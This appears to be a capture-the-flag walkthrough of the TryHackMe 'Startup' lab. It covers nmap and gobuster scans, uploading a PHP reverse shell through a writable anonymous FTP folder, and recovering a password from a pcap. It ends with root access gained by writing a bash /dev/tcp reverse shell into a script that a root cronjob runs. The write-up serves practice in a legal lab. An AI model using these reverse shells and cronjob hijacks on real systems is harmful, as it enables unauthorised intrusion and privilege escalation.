TryHackMe: Startup
Not much to say about this Startup room, it’s fun but simple. Very appropriate to its level, and you can learn a thing or two. Besides that, it counts as another step to becoming better everyday.
https://tryhackme.com/room/startup
Initial Enumeration
Nmap Scan
We start with our nmap scan:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -T4 -n -sC -sV -Pn -p- --min-rate 1000 --max-retries 3 10.10.142.146
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-10 13:59 BST
Warning: 10.10.142.146 giving up on port because retransmission cap hit (3).
Nmap scan report for 10.10.142.146
Host is up (0.058s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxrwx 2 65534 65534 4096 Nov 12 2020 ftp [NSE: writeable]
| -rw-r--r-- 1 0 0 251631 Nov 12 2020 important.jpg
|_-rw-r--r-- 1 0 0 208 Nov 12 2020 notice.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to -
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b9:a6:0b:84:1d:22:01:a4:01:30:48:43:61:2b:ab:94 (RSA)
| 256 ec:13:25:8c:18:20:36:e6:ce:91:0e:16:26:eb:a2:be (ECDSA)
|_ 256 a2:ff:2a:72:81:aa:a2:9f:55:a4:dc:92:23:e6:b4:3f (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Maintenance
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.86 seconds
FTP
At first glance, nothing that catches the eye, so we proceed to log into ftp to read the content of the files inside:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(kali㉿kali)-[~/Desktop]
└─$ ftp 10.10.142.146
Connected to 10.10.142.146.
220 (vsFTPd 3.0.3)
Name (10.10.142.146:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||14856|)
150 Here comes the directory listing.
drwxr-xr-x 3 65534 65534 4096 Nov 12 2020 .
drwxr-xr-x 3 65534 65534 4096 Nov 12 2020 ..
-rw-r--r-- 1 0 0 5 Nov 12 2020 .test.log
drwxrwxrwx 2 65534 65534 4096 Nov 12 2020 ftp
-rw-r--r-- 1 0 0 251631 Nov 12 2020 important.jpg
-rw-r--r-- 1 0 0 208 Nov 12 2020 notice.txt
226 Directory send OK.
ftp> get important.jpg
local: important.jpg remote: important.jpg
229 Entering Extended Passive Mode (|||64797|)
150 Opening BINARY mode data connection for important.jpg (251631 bytes).
100% |***********************************************************************************************| 245 KiB 1.04 MiB/s 00:00 ETA
226 Transfer complete.
251631 bytes received in 00:00 (861.65 KiB/s)
ftp> get notice.txt
local: notice.txt remote: notice.txt
229 Entering Extended Passive Mode (|||55069|)
150 Opening BINARY mode data connection for notice.txt (208 bytes).
100% |***********************************************************************************************| 208 445.44 KiB/s 00:00 ETA
226 Transfer complete.
208 bytes received in 00:00 (3.55 KiB/s)
ftp>
Web 80
Looking at notice.txt there is something that hints us about their website. To check this, we first navigate to their website:
Gobuster Scan
Nothing on the main page, and nothing on the source code, so our next step is a gobuster scan:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
┌──(kali㉿kali)-[~/Desktop]
└─$ gobuster dir -w /usr/share/wordlists/dirb/common.txt -x ".txt,.html,.php" -t 25 --timeout 20s -u http://10.10.142.146
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.142.146
[+] Method: GET
[+] Threads: 25
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,html,php
[+] Timeout: 20s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/files (Status: 301) [Size: 314] [--> http://10.10.142.146/files/]
/index.html (Status: 200) [Size: 808]
/server-status (Status: 403) [Size: 278]
Progress: 18456 / 18460 (99.98%)
===============================================================
Finished
===============================================================
Navigating to the new-found directory called files we see the FTP files and the other folder:
Shell as www-data
If we look back to the nmap scan, we will see that the ftp folder is writeable, and since it’s being hosted on their web server, we could send a reverse shell to the ftp folder to gain access to their server.
First step is to send a php reverse shell to the ftp folder:
1
2
3
4
5
6
7
ftp> put shell.php
local: shell.php remote: shell.php
229 Entering Extended Passive Mode (|||55507|)
150 Ok to send data.
100% |***********************************************************************************************| 158 1.00 MiB/s 00:00 ETA
226 Transfer complete.
158 bytes sent in 00:00 (1.40 KiB/s)
After that we go to the files directory on the website and open the shell.php file:
1
2
3
4
5
6
7
8
9
10
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -vlnp 4444
listening on [any] 4444 ...
connect to [-] from (UNKNOWN) [10.10.142.146] 35678
Linux startup 4.4.0-190-generic #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
13:15:29 up 17 min, 0 users, load average: 0.11, 0.16, 0.06
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
Now inside www-data, we have access to the secret spicy soup recipe:
1
2
3
4
5
6
7
www-data@startup:/$ ls
bin home lib mnt root srv vagrant
boot incidents lib64 opt run sys var
dev initrd.img lost+found proc sbin tmp vmlinuz
etc initrd.img.old media recipe.txt snap usr vmlinuz.old
www-data@startup:/$ cat recipe.txt
Someone asked what our main ingredient to our spice soup is today. I figured I can't keep it a secret forever and told him it was love.
Shell as lennie
Looking around the / directory, we see a folder called incidents, and inside it had a .pcapng file. We don’t have www-data password, so to get around this, what we can do is copy the file to /var/www/html/files/ftp/ and download it from there:
1
www-data@startup:/incidents$ cp suspicious.pcapng /var/www/html/files/ftp/
Analyzing the file we see that it revolves around another reverse shell being used in port 4444, we can use this and understand what happened better:
We can see that the shell was successful, and scrolling down a bit we also see the person trying to use a password on www-data but with no success. The only user with a home directory is called lennie, this hints that the password being used is for lennie instead of www-data:
With the password we can log into lennie and get the user flag:
1
2
3
4
5
6
7
┌──(kali㉿kali)-[~/Desktop]
└─$ ssh lennie@10.10.142.146
lennie@10.10.142.146's password:
$ ls
Documents scripts user.txt
$ cat user.txt
THM{REDACTED}
Shell as root
Inside lennie's home directory, are 2 other folders. Inside Documents, we couldn’t find anything useful, but inside scripts was something interesting:
1
2
3
4
5
6
7
8
9
10
lennie@startup:~/scripts$ ls -la
total 16
drwxr-xr-x 2 root root 4096 Nov 12 2020 .
drwx------ 5 lennie lennie 4096 Apr 10 13:31 ..
-rwxr-xr-x 1 root root 77 Nov 12 2020 planner.sh
-rw-r--r-- 1 root root 1 Apr 10 13:33 startup_list.txt
lennie@startup:~/scripts$ cat planner.sh
#!/bin/bash
echo $LIST > /home/lennie/scripts/startup_list.txt
/etc/print.sh
We can’t change this script, but after checking the /etc/print.sh one we see that we are the owners and can write to it:
1
2
lennie@startup:/etc$ ls -lah print.sh
-rwx------ 1 lennie lennie 25 Nov 12 2020 print.sh
To go beyond with this we first need to make sure that we have indeed an attack vector, could either be through sudo permissions, or cronjobs. sudo -l didn’t work, and /etc/crontab was empty, our only hope was to use pspy. And after running it we do find something related to the planner.sh file:
1
2
2025/04/10 13:43:01 CMD: UID=0 PID=4526 | /bin/bash /home/lennie/scripts/planner.sh
2025/04/10 13:43:01 CMD: UID=0 PID=4525 | /bin/sh -c /home/lennie/scripts/planner.sh
Since the planner.sh file will run as root, all we have to do is make the print.sh a reverse shell and wait for the cronjob to run:
1
2
#!/bin/bash
/bin/bash -i >& /dev/tcp/-/4444 0>&1
Not even a minute, and we are inside root and can finally read its flag:
1
2
3
4
5
6
7
8
9
10
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -vlnp 4444
listening on [any] 4444 ...
connect to [-] from (UNKNOWN) [10.10.142.146] 35732
bash: cannot set terminal process group (4537): Inappropriate ioctl for device
bash: no job control in this shell
root@startup:~# ls
root.txt
root@startup:~# cat root.txt
THM{REDACTED}